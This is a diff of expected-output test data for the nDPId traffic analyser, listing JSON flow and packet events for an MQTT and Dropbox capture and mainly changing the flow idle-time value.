-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELpAAIAG+FzAqDgBwKg4ZdETRF1NYgogm49Jd1AYAQCrGAAAwAAAAAAA"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqf0dAAEAGyc\/AqDhlwKg4AURd0RObj0l3TWIKIlAYAOXx0wAA0AA="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455907258532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907258532,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELtAAIAG+F3AqDgBwKg4ZdETRF1NYgoim49JeVAQAQBrHwAAAAAAAAAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907267002,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1455907267002,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAA0ELxAAIAG+FDAqDgBwKg4ZdEYRF3fAvFmAAAAAIACIAB3eQAAAgQFtAEDAwgBAQQC"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnAERyCAAnmO\/hCABFAAA0AABAAEAGSQ3AqDhlwKg4AURd0RiuSO3C3wLxZ4ASchDx3QAAAgQFtAEBBAIBAwMH"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455907267002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoEL1AAIAG+FvAqDgBwKg4ZdEYRF3fAvFnrkjtw1AQAQA7MAAAAAAAAAAA"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1455907267002,"flow_last_seen":1455907267007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1455907267007,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455907258332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELpAAIAG+FzAqDgBwKg4ZdETRF1NYgogm49Jd1AYAQCrGAAAwAAAAAAA"} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455907258332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqf0dAAEAGyc\/AqDhlwKg4AURd0RObj0l3TWIKIlAYAOXx0wAA0AA="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455907258532,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907258532,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELtAAIAG+F3AqDgBwKg4ZdETRF1NYgoim49JeVAQAQBrHwAAAAAAAAAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907267002,"flow_last_seen":1455907267002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1455907267002,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455907267002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAA0ELxAAIAG+FDAqDgBwKg4ZdEYRF3fAvFmAAAAAIACIAB3eQAAAgQFtAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455907267002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnAERyCAAnmO\/hCABFAAA0AABAAEAGSQ3AqDhlwKg4AURd0RiuSO3C3wLxZ4ASchDx3QAAAgQFtAEBBAIBAwMH"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455907267002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoEL1AAIAG+FvAqDgBwKg4ZdEYRF3fAvFnrkjtw1AQAQA7MAAAAAAAAAAA"} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1455907267002,"flow_last_seen":1455907267007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1455907267007,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455907271481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1455907271481,"pkt":"CAAnmO\/hCAAnAERyCABFAAB8EMQAAIARN\/bAqDgBwKg4ZcSHRFwAaLRJQwM1AW9STXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMSBFRVQgMjAxNiJ9"} 00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAB+1KdAAEAGdBvAqDhlwKg4AURd0RSW3pIhxZi6gFAYAOXyJwAAMlQACEJ1czE3Q21kAAJ7Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7560000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455907271483,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAB+1KdAAEAGdBvAqDhlwKg4AURd0RSW3pIhxZi6gFAYAOXyJwAAMlQACEJ1czE3Q21kAAJ7Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7560000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455907271483,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAAvXYVAAEAR64HAqDhlwKg4AURcxIcAG\/HjY0Q1AW9STYsvci9CdXMxN0NtZA=="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455907271485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1455907271485,"pkt":"CAAnmO\/hCAAnAERyCABFAAAsEMdAAIAG+E3AqDgBwKg4ZdEURF3FmLqAlt6Sd1AYAP++LAAAQAIAAgAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455907271522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1455907271522,"pkt":"CAAnAERyCAAnmO\/hCABFAAAo1KhAAEAGdHDAqDhlwKg4AURd0RSW3pJ3xZi6hFAQAOXx0QAA"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455907271485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1455907271485,"pkt":"CAAnmO\/hCAAnAERyCABFAAAsEMdAAIAG+E3AqDgBwKg4ZdEURF3FmLqAlt6Sd1AYAP++LAAAQAIAAgAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455907271522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1455907271522,"pkt":"CAAnAERyCAAnmO\/hCABFAAAo1KhAAEAGdHDAqDhlwKg4AURd0RSW3pJ3xZi6hFAQAOXx0QAA"} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1455907271585,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907271585,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EM0AAIARN+7AqDgBwKg4ZcSHRFwAZzJrQgM1Anj4ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":180000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455907272856,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907272856,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EWkAAIARN1LAqDgBwKg4ZcSORFwAZ7scQgMdqQeYckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjEyIEVFVCAyMDE2In0="} @@ -84,10 +84,10 @@ 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1922,"flow_first_seen":1455907243976,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1926,"flow_first_seen":1455907258332,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1919,"flow_first_seen":1455907271483,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1928,"flow_first_seen":1455907267002,"flow_last_seen":1455907286845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61855,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 